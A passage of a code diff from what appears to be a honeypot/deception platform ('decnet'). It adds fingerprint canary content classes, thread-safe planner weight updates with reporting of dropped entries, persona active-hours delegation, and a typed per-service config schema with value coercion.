        "attacker_ip": attacker_ip,
        "bounty_type": "probe_relay",
        "payload": {
            "stored_as": stored_as,
            "forwarded": ok,
            **({"fwd_error": reason} if not ok else {}),
        },
    })
    if ok:
        logger.info("smtp probe forwarded decky=%s ip=%s", decky_name, attacker_ip)
    else:
        logger.warning(
            "smtp probe forward failed decky=%s ip=%s error=%s",
            decky_name, attacker_ip, reason,
        )
|
||||||
|
|
||||||
|
|
||||||
async def _record_synthetic_file(repo, action) -> None:
|
async def _record_synthetic_file(repo, action) -> None:
|
||||||
"""Persist (or patch) a synthetic_files row after a FileAction plant.
|
"""Persist (or patch) a synthetic_files row after a FileAction plant.
|
||||||
|
|
||||||
|
|||||||
@@ -25,11 +25,14 @@ from __future__ import annotations
|
|||||||
import asyncio
|
import asyncio
|
||||||
import secrets
|
import secrets
|
||||||
from datetime import datetime, timezone
|
from datetime import datetime, timezone
|
||||||
from typing import Callable, Optional
|
from typing import TYPE_CHECKING, Callable, Optional
|
||||||
|
|
||||||
from decnet.logging import get_logger
|
from decnet.logging import get_logger
|
||||||
from decnet.realism.taxonomy import ContentClass
|
from decnet.realism.taxonomy import ContentClass
|
||||||
|
|
||||||
|
if TYPE_CHECKING:
|
||||||
|
from decnet.realism.personas import EmailPersona
|
||||||
|
|
||||||
log = get_logger("realism.bodies")
|
log = get_logger("realism.bodies")
|
||||||
|
|
||||||
|
|
||||||
@@ -205,6 +208,9 @@ _BODIES: dict[ContentClass, Callable[[str, secrets.SystemRandom], str]] = {
|
|||||||
ContentClass.LOG_DAEMON: _body_log_daemon,
|
ContentClass.LOG_DAEMON: _body_log_daemon,
|
||||||
ContentClass.CACHE_TMP: _body_cache_tmp,
|
ContentClass.CACHE_TMP: _body_cache_tmp,
|
||||||
ContentClass.EMAIL: _body_email,
|
ContentClass.EMAIL: _body_email,
|
||||||
|
# All canary classes share one placeholder — content-class discriminant is the
|
||||||
|
# "what"; the real payload (token slug, DNS hook URL) is injected by the canary
|
||||||
|
# cultivator. Do not replace with distinct generators without updating cultivator.
|
||||||
ContentClass.CANARY_AWS_CREDS: _body_canary,
|
ContentClass.CANARY_AWS_CREDS: _body_canary,
|
||||||
ContentClass.CANARY_ENV_FILE: _body_canary,
|
ContentClass.CANARY_ENV_FILE: _body_canary,
|
||||||
ContentClass.CANARY_GIT_CONFIG: _body_canary,
|
ContentClass.CANARY_GIT_CONFIG: _body_canary,
|
||||||
@@ -213,6 +219,8 @@ _BODIES: dict[ContentClass, Callable[[str, secrets.SystemRandom], str]] = {
|
|||||||
ContentClass.CANARY_HONEYDOC_DOCX: _body_canary,
|
ContentClass.CANARY_HONEYDOC_DOCX: _body_canary,
|
||||||
ContentClass.CANARY_HONEYDOC_PDF: _body_canary,
|
ContentClass.CANARY_HONEYDOC_PDF: _body_canary,
|
||||||
ContentClass.CANARY_MYSQL_DUMP: _body_canary,
|
ContentClass.CANARY_MYSQL_DUMP: _body_canary,
|
||||||
|
ContentClass.CANARY_FINGERPRINT_HTML: _body_canary,
|
||||||
|
ContentClass.CANARY_FINGERPRINT_SVG: _body_canary,
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
@@ -240,7 +248,7 @@ def make_body(
|
|||||||
|
|
||||||
async def make_body_with_llm(
|
async def make_body_with_llm(
|
||||||
content_class: ContentClass,
|
content_class: ContentClass,
|
||||||
persona, # EmailPersona — typed loosely to avoid an import cycle
|
persona: "EmailPersona",
|
||||||
*,
|
*,
|
||||||
llm=None, # LLMBackend | None
|
llm=None, # LLMBackend | None
|
||||||
breaker=None, # LLMCircuitBreaker | None
|
breaker=None, # LLMCircuitBreaker | None
|
||||||
|
|||||||
@@ -38,7 +38,7 @@ def _parse_window(window: str) -> tuple[int, int, int, int] | None:
|
|||||||
|
|
||||||
Returns ``None`` for malformed input — callers treat that as
|
Returns ``None`` for malformed input — callers treat that as
|
||||||
"always-on" so a single config typo never silences the whole fleet
|
"always-on" so a single config typo never silences the whole fleet
|
||||||
(mirrors :func:`decnet.realism.personas.in_active_hours` semantics).
|
(:func:`decnet.realism.personas.in_active_hours` delegates here).
|
||||||
"""
|
"""
|
||||||
try:
|
try:
|
||||||
start_s, end_s = window.split("-")
|
start_s, end_s = window.split("-")
|
||||||
|
|||||||
@@ -38,7 +38,7 @@ class FakeBackend(LLMBackend):
|
|||||||
)
|
)
|
||||||
self._success = success
|
self._success = success
|
||||||
|
|
||||||
async def generate(self, prompt: str) -> LLMResult: # noqa: ARG002
|
async def generate(self, _prompt: str) -> LLMResult:
|
||||||
t0 = time.monotonic()
|
t0 = time.monotonic()
|
||||||
latency_ms = int((time.monotonic() - t0) * 1000)
|
latency_ms = int((time.monotonic() - t0) * 1000)
|
||||||
return LLMResult(
|
return LLMResult(
|
||||||
|
|||||||
@@ -159,6 +159,8 @@ _NAMERS: dict[ContentClass, Callable[[str, secrets.SystemRandom], str]] = {
|
|||||||
ContentClass.CANARY_HONEYDOC_DOCX: _name_canary,
|
ContentClass.CANARY_HONEYDOC_DOCX: _name_canary,
|
||||||
ContentClass.CANARY_HONEYDOC_PDF: _name_canary,
|
ContentClass.CANARY_HONEYDOC_PDF: _name_canary,
|
||||||
ContentClass.CANARY_MYSQL_DUMP: _name_canary,
|
ContentClass.CANARY_MYSQL_DUMP: _name_canary,
|
||||||
|
ContentClass.CANARY_FINGERPRINT_HTML: _name_canary,
|
||||||
|
ContentClass.CANARY_FINGERPRINT_SVG: _name_canary,
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|||||||
@@ -19,11 +19,13 @@ not stall the entire realism tick.
|
|||||||
from __future__ import annotations
|
from __future__ import annotations
|
||||||
|
|
||||||
import json
|
import json
|
||||||
|
from datetime import datetime
|
||||||
from typing import Literal, Optional
|
from typing import Literal, Optional
|
||||||
|
|
||||||
from pydantic import BaseModel, Field, ValidationError, field_validator, model_validator
|
from pydantic import BaseModel, Field, ValidationError, field_validator, model_validator
|
||||||
|
|
||||||
from decnet.logging import get_logger
|
from decnet.logging import get_logger
|
||||||
|
from decnet.realism.diurnal import in_work_hours
|
||||||
|
|
||||||
logger = get_logger("realism.personas")
|
logger = get_logger("realism.personas")
|
||||||
|
|
||||||
@@ -132,22 +134,10 @@ def login_for(persona: str) -> str:
|
|||||||
return "user"
|
return "user"
|
||||||
|
|
||||||
|
|
||||||
def in_active_hours(persona: EmailPersona, now_hour: int) -> bool:
|
def in_active_hours(persona: EmailPersona, now: datetime) -> bool:
|
||||||
"""Return True if *now_hour* (0–23) falls in the persona's window.
|
"""Return True if *now* falls in the persona's active-hours window.
|
||||||
|
|
||||||
Format: ``"HH:MM-HH:MM"``. Wrap-around windows (``"22:00-06:00"``)
|
Delegates to :func:`decnet.realism.diurnal.in_work_hours` so minute
|
||||||
are supported. Invalid windows treat the persona as always-on so a
|
precision is preserved (``"09:30-17:45"`` is honoured correctly).
|
||||||
config typo never silences the whole fleet.
|
|
||||||
"""
|
"""
|
||||||
try:
|
return in_work_hours(persona.active_hours, now)
|
||||||
start_s, end_s = persona.active_hours.split("-")
|
|
||||||
start_h = int(start_s.split(":")[0])
|
|
||||||
end_h = int(end_s.split(":")[0])
|
|
||||||
except (ValueError, IndexError):
|
|
||||||
return True
|
|
||||||
if start_h == end_h:
|
|
||||||
return True
|
|
||||||
if start_h < end_h:
|
|
||||||
return start_h <= now_hour < end_h
|
|
||||||
# Wrap-around (e.g. 22:00-06:00).
|
|
||||||
return now_hour >= start_h or now_hour < end_h
|
|
||||||
|
|||||||
@@ -120,11 +120,19 @@ def load(*, language_default: str = "en") -> list[EmailPersona]:
|
|||||||
logger.warning("realism global pool: read failed path=%s: %s", path, exc)
|
logger.warning("realism global pool: read failed path=%s: %s", path, exc)
|
||||||
return []
|
return []
|
||||||
|
|
||||||
|
# Re-stat after the read so the stored mtime reflects what we actually
|
||||||
|
# parsed — a file change between the initial stat and read would otherwise
|
||||||
|
# cache a stale mtime and suppress the next reload.
|
||||||
|
try:
|
||||||
|
st2 = path.stat()
|
||||||
|
except OSError:
|
||||||
|
st2 = st
|
||||||
|
|
||||||
parsed = parse_personas(raw, language_default=language_default)
|
parsed = parse_personas(raw, language_default=language_default)
|
||||||
with _lock:
|
with _lock:
|
||||||
_cache = parsed
|
_cache = parsed
|
||||||
_cache_path = path
|
_cache_path = path
|
||||||
_cache_mtime = st.st_mtime
|
_cache_mtime = st2.st_mtime
|
||||||
if parsed:
|
if parsed:
|
||||||
logger.info(
|
logger.info(
|
||||||
"realism global pool: loaded %d personas from %s", len(parsed), path,
|
"realism global pool: loaded %d personas from %s", len(parsed), path,
|
||||||
|
|||||||
@@ -20,6 +20,7 @@ persona outside its window is never considered.
|
|||||||
from __future__ import annotations
|
from __future__ import annotations
|
||||||
|
|
||||||
import secrets
|
import secrets
|
||||||
|
import threading
|
||||||
from datetime import datetime
|
from datetime import datetime
|
||||||
from typing import Any, Optional, Sequence
|
from typing import Any, Optional, Sequence
|
||||||
|
|
||||||
@@ -62,6 +63,8 @@ _DEFAULT_CANARY_CLASS_WEIGHTS: tuple[tuple[ContentClass, int], ...] = (
|
|||||||
(ContentClass.CANARY_HONEYDOC_DOCX, 1),
|
(ContentClass.CANARY_HONEYDOC_DOCX, 1),
|
||||||
(ContentClass.CANARY_HONEYDOC_PDF, 1),
|
(ContentClass.CANARY_HONEYDOC_PDF, 1),
|
||||||
(ContentClass.CANARY_MYSQL_DUMP, 1),
|
(ContentClass.CANARY_MYSQL_DUMP, 1),
|
||||||
|
(ContentClass.CANARY_FINGERPRINT_HTML, 1),
|
||||||
|
(ContentClass.CANARY_FINGERPRINT_SVG, 1),
|
||||||
)
|
)
|
||||||
_DEFAULT_CANARY_PROBABILITY = 0.03
|
_DEFAULT_CANARY_PROBABILITY = 0.03
|
||||||
|
|
||||||
@@ -72,6 +75,7 @@ _USER_CLASS_WEIGHTS: tuple[tuple[ContentClass, int], ...] = _DEFAULT_USER_CLASS_
|
|||||||
_SYSTEM_CLASS_WEIGHTS: tuple[tuple[ContentClass, int], ...] = _DEFAULT_SYSTEM_CLASS_WEIGHTS
|
_SYSTEM_CLASS_WEIGHTS: tuple[tuple[ContentClass, int], ...] = _DEFAULT_SYSTEM_CLASS_WEIGHTS
|
||||||
_CANARY_CLASS_WEIGHTS: tuple[tuple[ContentClass, int], ...] = _DEFAULT_CANARY_CLASS_WEIGHTS
|
_CANARY_CLASS_WEIGHTS: tuple[tuple[ContentClass, int], ...] = _DEFAULT_CANARY_CLASS_WEIGHTS
|
||||||
_CANARY_PROBABILITY: float = _DEFAULT_CANARY_PROBABILITY
|
_CANARY_PROBABILITY: float = _DEFAULT_CANARY_PROBABILITY
|
||||||
|
_planner_lock = threading.Lock()
|
||||||
|
|
||||||
|
|
||||||
def _serialize_weights(
|
def _serialize_weights(
|
||||||
@@ -82,12 +86,15 @@ def _serialize_weights(
|
|||||||
|
|
||||||
def _parse_weights(
|
def _parse_weights(
|
||||||
raw: Any, allowed: set[ContentClass],
|
raw: Any, allowed: set[ContentClass],
|
||||||
) -> tuple[tuple[ContentClass, int], ...]:
|
) -> tuple[tuple[tuple[ContentClass, int], ...], list[str]]:
|
||||||
"""Parse ``[{"content_class": "...", "weight": N}, ...]`` into the
|
"""Parse ``[{"content_class": "...", "weight": N}, ...]`` into the
|
||||||
planner's internal tuple shape. Drops entries whose ``content_class``
|
planner's internal tuple shape.
|
||||||
isn't in *allowed* (defends against an operator pasting in a canary
|
|
||||||
class on the user list, which would skew sampling without the
|
Returns ``(weights, dropped)`` where *dropped* is the list of
|
||||||
canary-probability gate).
|
``content_class`` values that were valid enum members but not in
|
||||||
|
*allowed* (e.g. a canary class pasted onto the user list). Callers
|
||||||
|
surface *dropped* in the API response so the operator can see the
|
||||||
|
entry didn't land without having to re-read the config.
|
||||||
|
|
||||||
Raises ``ValueError`` on structural problems (non-list, non-int
|
Raises ``ValueError`` on structural problems (non-list, non-int
|
||||||
weight, negative weight, empty result) so the API can return 400.
|
weight, negative weight, empty result) so the API can return 400.
|
||||||
@@ -95,6 +102,7 @@ def _parse_weights(
|
|||||||
if not isinstance(raw, list):
|
if not isinstance(raw, list):
|
||||||
raise ValueError("weights must be a list")
|
raise ValueError("weights must be a list")
|
||||||
out: list[tuple[ContentClass, int]] = []
|
out: list[tuple[ContentClass, int]] = []
|
||||||
|
dropped: list[str] = []
|
||||||
for entry in raw:
|
for entry in raw:
|
||||||
if not isinstance(entry, dict):
|
if not isinstance(entry, dict):
|
||||||
raise ValueError("each weight entry must be an object")
|
raise ValueError("each weight entry must be an object")
|
||||||
@@ -111,18 +119,14 @@ def _parse_weights(
|
|||||||
except (ValueError, TypeError):
|
except (ValueError, TypeError):
|
||||||
raise ValueError(f"unknown content_class: {cls_name!r}")
|
raise ValueError(f"unknown content_class: {cls_name!r}")
|
||||||
if cls not in allowed:
|
if cls not in allowed:
|
||||||
# Silently drop — a class that doesn't belong on this list
|
dropped.append(cls.value)
|
||||||
# (e.g. a canary class on the user list) is operator error,
|
|
||||||
# but we don't want to fail the whole save over one stray
|
|
||||||
# entry. The roundtrip in current_payload() will show the
|
|
||||||
# operator their entry didn't land.
|
|
||||||
continue
|
continue
|
||||||
out.append((cls, weight))
|
out.append((cls, weight))
|
||||||
if not out:
|
if not out:
|
||||||
raise ValueError("weights list resolved to zero valid entries")
|
raise ValueError("weights list resolved to zero valid entries")
|
||||||
if sum(w for _, w in out) <= 0:
|
if sum(w for _, w in out) <= 0:
|
||||||
raise ValueError("weights must sum to a positive number")
|
raise ValueError("weights must sum to a positive number")
|
||||||
return tuple(out)
|
return tuple(out), dropped
|
||||||
|
|
||||||
|
|
||||||
_USER_CLASSES: set[ContentClass] = {
|
_USER_CLASSES: set[ContentClass] = {
|
||||||
@@ -136,6 +140,7 @@ _CANARY_CLASSES: set[ContentClass] = {
|
|||||||
ContentClass.CANARY_GIT_CONFIG, ContentClass.CANARY_SSH_KEY,
|
ContentClass.CANARY_GIT_CONFIG, ContentClass.CANARY_SSH_KEY,
|
||||||
ContentClass.CANARY_HONEYDOC, ContentClass.CANARY_HONEYDOC_DOCX,
|
ContentClass.CANARY_HONEYDOC, ContentClass.CANARY_HONEYDOC_DOCX,
|
||||||
ContentClass.CANARY_HONEYDOC_PDF, ContentClass.CANARY_MYSQL_DUMP,
|
ContentClass.CANARY_HONEYDOC_PDF, ContentClass.CANARY_MYSQL_DUMP,
|
||||||
|
ContentClass.CANARY_FINGERPRINT_HTML, ContentClass.CANARY_FINGERPRINT_SVG,
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
@@ -151,15 +156,21 @@ def current_payload() -> dict[str, Any]:
|
|||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
def apply_payload(payload: dict[str, Any]) -> None:
|
def apply_payload(payload: dict[str, Any]) -> list[str]:
|
||||||
"""Override the planner's live globals from a wire payload.
|
"""Override the planner's live globals from a wire payload.
|
||||||
|
|
||||||
Validates structurally and rebinds module-level names atomically
|
Validates structurally and rebinds module-level names atomically
|
||||||
per field — partial failures don't leave the planner in a torn
|
per field — partial failures don't leave the planner in a torn
|
||||||
state because validation happens before any rebind.
|
state because validation happens before any rebind.
|
||||||
|
|
||||||
|
Returns the list of ``content_class`` values that were dropped
|
||||||
|
because they didn't belong on their target list (e.g. a canary
|
||||||
|
class on the user list). Callers should surface this in the API
|
||||||
|
response so operators know their entry didn't land.
|
||||||
|
|
||||||
Unknown fields are ignored (forward-compat); fields not present
|
Unknown fields are ignored (forward-compat); fields not present
|
||||||
leave the corresponding global untouched."""
|
leave the corresponding global untouched.
|
||||||
|
"""
|
||||||
global _USER_CLASS_WEIGHTS, _SYSTEM_CLASS_WEIGHTS
|
global _USER_CLASS_WEIGHTS, _SYSTEM_CLASS_WEIGHTS
|
||||||
global _CANARY_CLASS_WEIGHTS, _CANARY_PROBABILITY
|
global _CANARY_CLASS_WEIGHTS, _CANARY_PROBABILITY
|
||||||
|
|
||||||
@@ -167,37 +178,45 @@ def apply_payload(payload: dict[str, Any]) -> None:
|
|||||||
new_system = _SYSTEM_CLASS_WEIGHTS
|
new_system = _SYSTEM_CLASS_WEIGHTS
|
||||||
new_canary = _CANARY_CLASS_WEIGHTS
|
new_canary = _CANARY_CLASS_WEIGHTS
|
||||||
new_prob = _CANARY_PROBABILITY
|
new_prob = _CANARY_PROBABILITY
|
||||||
|
all_dropped: list[str] = []
|
||||||
|
|
||||||
if "user_class_weights" in payload:
|
if "user_class_weights" in payload:
|
||||||
new_user = _parse_weights(payload["user_class_weights"], _USER_CLASSES)
|
new_user, dropped = _parse_weights(payload["user_class_weights"], _USER_CLASSES)
|
||||||
|
all_dropped.extend(dropped)
|
||||||
if "system_class_weights" in payload:
|
if "system_class_weights" in payload:
|
||||||
new_system = _parse_weights(
|
new_system, dropped = _parse_weights(
|
||||||
payload["system_class_weights"], _SYSTEM_CLASSES,
|
payload["system_class_weights"], _SYSTEM_CLASSES,
|
||||||
)
|
)
|
||||||
|
all_dropped.extend(dropped)
|
||||||
if "canary_class_weights" in payload:
|
if "canary_class_weights" in payload:
|
||||||
new_canary = _parse_weights(
|
new_canary, dropped = _parse_weights(
|
||||||
payload["canary_class_weights"], _CANARY_CLASSES,
|
payload["canary_class_weights"], _CANARY_CLASSES,
|
||||||
)
|
)
|
||||||
|
all_dropped.extend(dropped)
|
||||||
if "canary_probability" in payload:
|
if "canary_probability" in payload:
|
||||||
prob = payload["canary_probability"]
|
prob = payload["canary_probability"]
|
||||||
if not isinstance(prob, (int, float)) or not (0.0 <= prob <= 1.0):
|
if not isinstance(prob, (int, float)) or not (0.0 <= prob <= 1.0):
|
||||||
raise ValueError("canary_probability must be in [0.0, 1.0]")
|
raise ValueError("canary_probability must be in [0.0, 1.0]")
|
||||||
new_prob = float(prob)
|
new_prob = float(prob)
|
||||||
|
|
||||||
_USER_CLASS_WEIGHTS = new_user
|
with _planner_lock:
|
||||||
_SYSTEM_CLASS_WEIGHTS = new_system
|
_USER_CLASS_WEIGHTS = new_user
|
||||||
_CANARY_CLASS_WEIGHTS = new_canary
|
_SYSTEM_CLASS_WEIGHTS = new_system
|
||||||
_CANARY_PROBABILITY = new_prob
|
_CANARY_CLASS_WEIGHTS = new_canary
|
||||||
|
_CANARY_PROBABILITY = new_prob
|
||||||
|
|
||||||
|
return all_dropped
|
||||||
|
|
||||||
|
|
||||||
def reset_to_defaults() -> None:
|
def reset_to_defaults() -> None:
|
||||||
"""Restore hardcoded defaults. Used by tests and the API reset path."""
|
"""Restore hardcoded defaults. Used by tests and the API reset path."""
|
||||||
global _USER_CLASS_WEIGHTS, _SYSTEM_CLASS_WEIGHTS
|
global _USER_CLASS_WEIGHTS, _SYSTEM_CLASS_WEIGHTS
|
||||||
global _CANARY_CLASS_WEIGHTS, _CANARY_PROBABILITY
|
global _CANARY_CLASS_WEIGHTS, _CANARY_PROBABILITY
|
||||||
_USER_CLASS_WEIGHTS = _DEFAULT_USER_CLASS_WEIGHTS
|
with _planner_lock:
|
||||||
_SYSTEM_CLASS_WEIGHTS = _DEFAULT_SYSTEM_CLASS_WEIGHTS
|
_USER_CLASS_WEIGHTS = _DEFAULT_USER_CLASS_WEIGHTS
|
||||||
_CANARY_CLASS_WEIGHTS = _DEFAULT_CANARY_CLASS_WEIGHTS
|
_SYSTEM_CLASS_WEIGHTS = _DEFAULT_SYSTEM_CLASS_WEIGHTS
|
||||||
_CANARY_PROBABILITY = _DEFAULT_CANARY_PROBABILITY
|
_CANARY_CLASS_WEIGHTS = _DEFAULT_CANARY_CLASS_WEIGHTS
|
||||||
|
_CANARY_PROBABILITY = _DEFAULT_CANARY_PROBABILITY
|
||||||
|
|
||||||
|
|
||||||
def _weighted_pick(
|
def _weighted_pick(
|
||||||
|
|||||||
@@ -62,6 +62,8 @@ class ContentClass(StrEnum):
|
|||||||
CANARY_HONEYDOC_DOCX = "canary_honeydoc_docx"
|
CANARY_HONEYDOC_DOCX = "canary_honeydoc_docx"
|
||||||
CANARY_HONEYDOC_PDF = "canary_honeydoc_pdf"
|
CANARY_HONEYDOC_PDF = "canary_honeydoc_pdf"
|
||||||
CANARY_MYSQL_DUMP = "canary_mysql_dump"
|
CANARY_MYSQL_DUMP = "canary_mysql_dump"
|
||||||
|
CANARY_FINGERPRINT_HTML = "canary_fingerprint_html"
|
||||||
|
CANARY_FINGERPRINT_SVG = "canary_fingerprint_svg"
|
||||||
|
|
||||||
def is_canary(self) -> bool:
|
def is_canary(self) -> bool:
|
||||||
return self.value.startswith("canary_")
|
return self.value.startswith("canary_")
|
||||||
|
|||||||
@@ -1,5 +1,47 @@
|
|||||||
|
import base64
|
||||||
|
import binascii
|
||||||
from abc import ABC, abstractmethod
|
from abc import ABC, abstractmethod
|
||||||
|
from dataclasses import asdict, dataclass
|
||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
|
from typing import Any, Literal
|
||||||
|
|
||||||
|
# Sentinel prefix used by the deploy wizard to ship multi-line textarea values
|
||||||
|
# through ConfigParser without relying on its multi-line continuation syntax.
|
||||||
|
# Plain raw values without the prefix are accepted as-is so direct API
|
||||||
|
# submitters (PUT /…/services/{svc}/config) keep working with raw strings.
|
||||||
|
TEXTAREA_B64_PREFIX = "b64:"
|
||||||
|
|
||||||
|
FieldType = Literal["string", "password", "int", "bool", "textarea", "enum"]
|
||||||
|
|
||||||
|
|
||||||
|
@dataclass(frozen=True)
class ServiceConfigField:
    """
    Immutable descriptor for a single operator-editable setting of a service.

    The Inspector form (Fleet + MazeNET) builds its inputs from these
    descriptors, and BaseService.validate_cfg coerces submitted values
    against them.
    """

    # Name of the entry in the submitted cfg dict; validate_cfg matches on it.
    key: str
    label: str
    # Selects the conversion applied by _coerce.
    type: FieldType = "string"
    # default / secret / help / placeholder are carried through to_json() for
    # the form; validate_cfg and _coerce do not read them.
    default: Any = None
    secret: bool = False
    help: str | None = None
    # Allowed values, checked by _coerce when type == "enum".
    enum: list[str] | None = None
    placeholder: str | None = None

    def to_json(self) -> dict:
        """Return the descriptor as a plain dict, omitting ``enum`` when unset."""
        payload = asdict(self)
        # Non-enum fields would otherwise ship a dangling ``"enum": None``
        # to the frontend.
        if payload["enum"] is None:
            del payload["enum"]
        return payload
|
||||||
|
|
||||||
|
|
||||||
|
class ConfigValidationError(ValueError):
    """Signals that a submitted service_cfg value does not fit the type its field declares."""
|
||||||
|
|
||||||
|
|
||||||
class BaseService(ABC):
|
class BaseService(ABC):
|
||||||
@@ -15,6 +57,10 @@ class BaseService(ABC):
|
|||||||
default_image: str # Docker image tag, or "build" if a Dockerfile is needed
|
default_image: str # Docker image tag, or "build" if a Dockerfile is needed
|
||||||
fleet_singleton: bool = False # True = runs once fleet-wide, not per-decky
|
fleet_singleton: bool = False # True = runs once fleet-wide, not per-decky
|
||||||
|
|
||||||
|
# Per-service customizable fields exposed to the Inspector UI.
|
||||||
|
# Subclasses override; default empty -> "No customizable fields".
|
||||||
|
config_schema: list[ServiceConfigField] = []
|
||||||
|
|
||||||
@abstractmethod
|
@abstractmethod
|
||||||
def compose_fragment(
|
def compose_fragment(
|
||||||
self,
|
self,
|
||||||
@@ -41,3 +87,63 @@ class BaseService(ABC):
|
|||||||
image built. Return None if default_image is used directly.
|
image built. Return None if default_image is used directly.
|
||||||
"""
|
"""
|
||||||
return None
|
return None
|
||||||
|
|
||||||
|
def validate_cfg(self, cfg: dict | None) -> dict:
|
||||||
|
"""
|
||||||
|
Coerce a user-submitted dict against this service's config_schema.
|
||||||
|
|
||||||
|
Unknown keys are silently dropped. Declared keys are coerced to their
|
||||||
|
declared type (raising ConfigValidationError on bad values). Empty
|
||||||
|
strings on optional fields drop the key entirely so compose_fragment's
|
||||||
|
existing `if "X" in cfg` guards keep working.
|
||||||
|
"""
|
||||||
|
out: dict[str, Any] = {}
|
||||||
|
if not cfg:
|
||||||
|
return out
|
||||||
|
by_key = {f.key: f for f in self.config_schema}
|
||||||
|
for key, raw in cfg.items():
|
||||||
|
spec = by_key.get(key)
|
||||||
|
if spec is None:
|
||||||
|
continue # drop unknown keys
|
||||||
|
if raw is None or raw == "":
|
||||||
|
continue
|
||||||
|
out[key] = _coerce(spec, raw)
|
||||||
|
return out
|
||||||
|
|
||||||
|
|
||||||
|
def _coerce(spec: ServiceConfigField, raw: Any) -> Any:
|
||||||
|
t = spec.type
|
||||||
|
if t in ("string", "password"):
|
||||||
|
return str(raw)
|
||||||
|
if t == "textarea":
|
||||||
|
s = str(raw)
|
||||||
|
if s.startswith(TEXTAREA_B64_PREFIX):
|
||||||
|
try:
|
||||||
|
return base64.b64decode(s[len(TEXTAREA_B64_PREFIX):], validate=True).decode("utf-8")
|
||||||
|
except (binascii.Error, UnicodeDecodeError) as e:
|
||||||
|
raise ConfigValidationError(
|
||||||
|
f"{spec.key}: malformed {TEXTAREA_B64_PREFIX} payload"
|
||||||
|
) from e
|
||||||
|
return s
|
||||||
|
if t == "int":
|
||||||
|
try:
|
||||||
|
return int(raw)
|
||||||
|
except (TypeError, ValueError) as e:
|
||||||
|
raise ConfigValidationError(f"{spec.key}: expected int, got {raw!r}") from e
|
||||||
|
if t == "bool":
|
||||||
|
if isinstance(raw, bool):
|
||||||
|
return raw
|
||||||
|
if isinstance(raw, str):
|
||||||
|
if raw.lower() in ("true", "1", "yes", "on"):
|
||||||
|
return True
|
||||||
|
if raw.lower() in ("false", "0", "no", "off"):
|
||||||
|
return False
|
||||||
|
raise ConfigValidationError(f"{spec.key}: expected bool, got {raw!r}")
|
||||||
|
if t == "enum":
|
||||||
|
s = str(raw)
|
||||||
|
if spec.enum and s not in spec.enum:
|
||||||
|
raise ConfigValidationError(
|
||||||
|
f"{spec.key}: {s!r} not in allowed values {spec.enum}"
|
||||||
|
)
|
||||||
|
return s
|
||||||
|
raise ConfigValidationError(f"{spec.key}: unknown field type {t!r}")
|
||||||
|
|||||||
@@ -12,6 +12,7 @@ class ConpotService(BaseService):
|
|||||||
name = "conpot"
|
name = "conpot"
|
||||||
ports = [502, 161, 80]
|
ports = [502, 161, 80]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
env = {
|
env = {
|
||||||
|
|||||||
@@ -8,6 +8,7 @@ class DockerAPIService(BaseService):
|
|||||||
name = "docker_api"
|
name = "docker_api"
|
||||||
ports = [2375, 2376]
|
ports = [2375, 2376]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
|
|||||||
@@ -9,6 +9,7 @@ class ElasticsearchService(BaseService):
|
|||||||
name = "elasticsearch"
|
name = "elasticsearch"
|
||||||
ports = [9200]
|
ports = [9200]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
|
|||||||
@@ -8,6 +8,7 @@ class FTPService(BaseService):
|
|||||||
name = "ftp"
|
name = "ftp"
|
||||||
ports = [21]
|
ports = [21]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
|
|||||||
@@ -1,6 +1,6 @@
|
|||||||
import json
|
import json
|
||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
from decnet.services.base import BaseService
|
from decnet.services.base import BaseService, ServiceConfigField
|
||||||
|
|
||||||
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "http"
|
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "http"
|
||||||
|
|
||||||
@@ -10,6 +10,41 @@ class HTTPService(BaseService):
|
|||||||
ports = [80, 443]
|
ports = [80, 443]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
|
||||||
|
config_schema = [
|
||||||
|
ServiceConfigField(
|
||||||
|
key="server_header",
|
||||||
|
label="Server header",
|
||||||
|
type="string",
|
||||||
|
placeholder="Apache/2.4.41 (Ubuntu)",
|
||||||
|
help="Value sent in the HTTP Server: response header.",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="response_code",
|
||||||
|
label="Default response code",
|
||||||
|
type="int",
|
||||||
|
default=200,
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="fake_app",
|
||||||
|
label="Fake application",
|
||||||
|
type="enum",
|
||||||
|
enum=["none", "wordpress", "phpmyadmin", "tomcat", "jenkins"],
|
||||||
|
default="none",
|
||||||
|
help="Pre-baked application skin to render on the index page.",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="extra_headers",
|
||||||
|
label="Extra headers (JSON or raw)",
|
||||||
|
type="textarea",
|
||||||
|
